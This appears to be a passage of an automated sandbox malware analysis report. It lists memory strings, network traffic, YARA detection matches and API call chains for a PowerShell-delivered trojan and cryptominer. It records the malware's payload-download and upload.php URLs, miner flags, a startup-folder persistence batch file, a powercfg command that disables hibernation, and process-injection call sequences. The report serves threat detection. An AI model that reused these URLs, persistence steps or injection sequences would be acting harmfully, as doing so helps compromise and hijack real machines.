                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023855822000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win
                    Source: explorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/
                    Source: downloaded_file.exeString found in binary or memory: https://woo097878781.win/32.EXE
                    Source: powershell.exe, 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F5E000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000376000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M
                    Source: explorer.exe, explorer.exe, 00000010.00000003.2038161328.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015592624.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXE
                    Source: downloaded_file.exe, 0000000D.00000003.1947121395.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-
                    Source: explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php6
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpJWO
                    Source: explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpProvider
                    Source: explorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpyeerysyjbfoqmofc
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/8p
                    Source: explorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/C
                    Source: downloaded_file.exe, 0000000D.00000003.1947121395.000000000105E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934426792.0000000002E06000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exe
                    Source: explorer.exe, 00000010.00000002.2934582465.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1
                    Source: powershell.exe, 0000000C.00000002.1939596081.0000029E75EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F59000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000371000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642019432.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023854E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/downloaded_file.bin
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/r
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/rdpi2
                    Source: explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/upload.php
                    Source: explorer.exe, 00000012.00000003.2618390437.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2689278327.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618618812.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/upload.php
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/upload.phpZ
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E12310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread,16_2_00E12310
                    Source: explorer.exe, 00000010.00000002.2934846757.0000000003930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ENCMARK RegisterRawInputDevicesmemstr_009c8cf7-4

                    System Summary

                    Source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.explorer.exe.22c0000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.downloaded_file.exe.fedfd8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000013.00000002.2048053802.0000016DE6950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000001F.00000002.2064926837.000001677A63A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000013.00000002.2047498175.0000016DE6452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000001F.00000002.2065257681.000001677A8C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_003138D0 GetCurrentProcess,Wow64DisableWow64FsRedirection,_memset,lstrcpyW,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,_memmove,_memmove,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,_memmove,CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,Wow64DisableWow64FsRedirection,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,Wow64DisableWow64FsRedirection,13_2_003138D0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0030A1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,13_2_0030A1B0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_003144B0 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,13_2_003144B0
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E10740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,16_2_00E10740
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E111A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,16_2_00E111A4
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E07940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess,16_2_00E07940
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 19_2_0000016DE6BC85B9 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,19_2_0000016DE6BC85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 19_2_0000016DE86C1394 NtWriteFile,19_2_0000016DE86C1394
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 31_2_000001677ADB85B9 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,31_2_000001677ADB85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 31_2_000001677C7E1394 NtCreatePartition,31_2_000001677C7E1394
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | File created: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC6ED119_2_0000016DE6BC6ED1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE86C336019_2_0000016DE86C3360
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB85B931_2_000001677ADB85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB7DAD31_2_000001677ADB7DAD
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB6ED131_2_000001677ADB6ED1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB906D31_2_000001677ADB906D
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB818931_2_000001677ADB8189
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677C7E336031_2_000001677C7E3360
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                    Source: C:\Windows\explorer.exeCode function: String function: 022F3030 appears 48 times
                    Source: C:\Windows\explorer.exeCode function: String function: 00E28378 appears 48 times
                    Source: C:\Windows\explorer.exeCode function: String function: 022D5C20 appears 59 times
                    Source: C:\Windows\explorer.exeCode function: String function: 02313CE0 appears 137 times
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: String function: 00007FF66CCC37E0 appears 70 times
Source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.explorer.exe.22c0000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.downloaded_file.exe.fedfd8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000013.00000002.2048053802.0000016DE6950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001F.00000002.2064926837.000001677A63A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000013.00000002.2047498175.0000016DE6452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001F.00000002.2065257681.000001677A8C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@59/22@2/4
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031CA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00312AB0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Mutant created: \Sessions\1\BaseNamedObjects\{7E105FD4-6112-4FB9-A722-91E984087449}
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Mutant created: \Sessions\1\BaseNamedObjects\{16875766-AD57-416F-8330-F0B6BCC3AFF1}
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D3378A42-4880-48C8-9826-A27CECC41889}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
